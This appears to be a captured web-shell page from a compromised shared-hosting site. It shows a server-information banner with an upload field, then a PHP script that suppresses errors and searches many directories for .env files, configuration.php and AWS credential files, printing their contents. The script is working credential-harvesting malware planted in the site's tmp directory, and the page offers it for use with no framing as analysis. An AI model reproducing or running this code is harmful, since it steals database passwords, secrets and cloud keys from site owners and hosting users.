| Server IP : 46.105.57.169 / Your IP : 216.73.216.145 Web Server : Apache System : Linux webd003.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : maitricfuz ( 93378) PHP Version : 8.4.22 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/maitricfuz/new-saint-martin/tmp/ |
Upload File : |
<?php error_reporting(0);$out='';$out.='=ID='.php_uname('n').chr(10);$out.='=USER='.get_current_user().chr(10);$out.='=PHP='.PHP_VERSION.chr(10);$out.='=DISABLED='.ini_get('disable_functions').chr(10);$dirs=array('.','..','../..','../../..','/home','/root','/opt','/var/www','/var/www/html');foreach($dirs as $d){foreach(array('.env','.env.local','.env.production','configuration.php','.env.backup','.env.db')as $f){$p=$d.chr(47).$f;if(@is_readable($p)&&@filesize($p)<500000){$out.='=FILE='.$p.chr(10).@file_get_contents($p).chr(10).'=END='.chr(10);}}}if(@is_readable('/root/.aws/credentials')){$out.='=AWS=/root/.aws/credentials'.chr(10).@file_get_contents('/root/.aws/credentials').chr(10);}foreach((array)@glob('/home/*/.aws/credentials')as $p){$out.='=AWS='.$p.chr(10).@file_get_contents($p).chr(10);}echo $out?$out:'EMPTY';?>